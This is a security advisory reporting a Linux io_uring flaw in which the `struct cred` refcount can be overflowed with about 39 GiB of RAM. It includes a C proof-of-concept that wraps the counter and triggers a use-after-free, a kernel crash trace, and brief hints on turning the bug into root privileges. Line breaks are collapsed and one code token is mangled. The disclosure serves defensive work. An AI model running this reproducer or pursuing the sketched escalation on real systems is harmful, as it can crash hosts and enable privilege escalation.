Headline
Linux 5.6 io_uring Cred Refcount Overflow
Linux versions 5.6 and above appear to suffer from a cred refcount overflow when handling approximately 39 gigabytes of memory usage via io_uring.
Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring(see also my related prior bug reports about overflowing refcounts with lotsof RAM usage:https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAMhttps://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)Since commit 071698e13ac6 (\"io_uring: allow registering credentials\"), landedin 5.6, it has been possible to grab references to `struct cred` veryefficiently - by repeatedly calling the syscall`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possibleto register up to 0xffff refcounted pointers to `struct cred` in an xarray(or in older kernel versions, in an IDR). These pointers can all be pointingto the same `struct cred`.By using a bunch of io_uring instances, that makes it possible to create alot of refcounted references to `struct cred` at a very efficient and lowamortized memory cost of less than 10 bytes per reference.`struct cred` is refcounted using the member `atomic_t usage`, which is aplain signed 32-bit atomic counter with no overflow checking.I believe there is some history here where Elena Reshetova and Kees Cook havebeen trying to turn it into a `refcount_t`, which would also fix this kind ofissue by marking the refcount as \"saturated\" when it reaches 2^31 and thennever freeing the object. Most recently there was this thread, where Keestried to get that change in; there was some discussion, but I don't thinkanything has landed so far:<https://lore.kernel.org/all/[email protected]/>So by using ~39 GiB of physical memory, it is possible to store 2^32references to `struct cred` and overflow the reference counter. That's notexactly a small amount of RAM, but I guess a lot of servers probably have thatmuch RAM? At least cloud providers like AWS sell machines with much more RAMthan that.I am including as recipients both akpm (who is the maintainer forkernel/cred.c and was involved in the linked discussion) and the io_uringmaintainers (though io_uring, in my opinion, isn't really where the core issuehere lies, but it happened to make it possible to hit this overflow using afairly small amount of physical memory).Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested itin a VM so that the host machine could swap a bit):============#define _GNU_SOURCE#include <pthread.h>#include <unistd.h>#include <err.h>#include <fcntl.h>#include <string.h>#include <stdio.h>#include <stdlib.h>#include <ctype.h>#include <signal.h>#include <sys/syscall.h>#include <sys/wait.h>#include <sys/prctl.h>#include <sys/mman.h>#include <sys/resource.h>#include <sys/eventfd.h>#include <linux/io_uring.h>#define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\})// power of 2#define PARALLELISM 4static int efd;static void *thread_fn(void *dummy) { for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) { struct io_uring_params params = { .flags = IORING_SETUP_NO_SQARRAY }; int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); printf(\"uring_fd = 0x%x\\", (unsigned int)uring_fd); for (int i=0; i<0xffff; i++, refcount++) SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0)); } printf(\"one thread ready\\"); eventfd_write(efd, 1); while (1) pause();}int main(void) { setbuf(stdout, NULL); sync(); struct rlimit rlim; SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim)); if (rlim.rlim_max < 65550) printf(\"WARNING: RLIMIT_NOFILE maximum is probably too low\\"); rlim.rlim_cur = rlim.rlim_max; SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim)); efd = SYSCHK(eventfd(0, 0)); pthread_t threads[PARALLELISM]; for (int i = 0; i < PARALLELISM; i++) { if (pthread_create(threads+i, NULL, thread_fn, NULL)) errx(1, \"pthread_create\"); } for (int i=0; i<4;) { eventfd_t val; SYSCHK(eventfd_read(efd, &val)); i += val; } printf(\"refs should have wrapped. press ctrl+c for uaf on cleanup.\\"); while (1) pause();}============The reproducer takes a while to run; when it's done and the cred refcount hasbeen wrapped, you can press ctrl+c to make the process exit, which willrepeatedly decrement the cred refcount until the cred refcount reaches zero(when there are actually 2^32 references remaining).At that point, it'll hit the `BUG_ON(cred == current->cred)` check in`__put_cred()`, since the reproducer doesn't go out of its way to avoid thischeck:============kernel BUG at kernel/cred.c:150!invalid opcode: 0000 [#1] PREEMPT SMPCPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK> [...] io_ring_ctx_wait_and_kill+0xa8/0x180 io_uring_release+0x20/0x30 __fput+0x92/0x2c0 task_work_run+0x5a/0x90 do_exit+0x36c/0xbc0 do_group_exit+0x37/0xa0 get_signal+0xbcf/0xbd0 arch_do_signal_or_restart+0x3e/0x270 exit_to_user_mode_prepare+0xba/0x110 syscall_exit_to_user_mode+0x21/0x50 do_syscall_64+0x52/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7ff41d547d92Code: Unable to access opcode bytes at 0x7ff41d547d68.RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfffR13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Fixing recursive fault but reboot is needed!============A use-after-free of `struct cred` should be exploitable; one method would beto try to get the freed object allocated again as the `struct cred` of aroot-privileged process, another method would be to try to reallocate theobject with a buffer containing attacker-controlled data somehow (and thenfake a full capability set in init_user_ns with UIDs set to zero).While one tempting easy fix here would be to close off avenues for gettinglots of references with little RAM (like somehow making io_uring reuse IDswith a local usage counter when userspace tries to insert the same`struct cred` into the xarray multiple times), I think that this example showshow fragile that method is. It requires knowing about all the variousreference paths that can hold references to `struct cred`, and what kinds ofmultipliers or global limits apply at every point in this reference graph.I think the kernel should be using some flavor of saturating refcounts as thedefault choice, at least on machines that have enough RAM to store 2^32pointers.If there are specific cases where the overhead is undesirable, I think weshould only omit such a check if we can document exactly how many referencescan exist at most, with enough warning comments scattered around to ensurethat the assumptions can't accidentally be broken inadvertently later on.(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except forspecially marked slabs that store objects guaranteed to not hold multiplereferences to the same object, but I think people would probably hate thatidea.)(But note that refcount hardening also has value for protecting against bugswhere some repeatedly executed codepath forgets to decrement the refcount,letting it drift up until it wraps around; and that kind of bug is alsoexploitable without using ginormous amounts of RAM.)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: [email protected]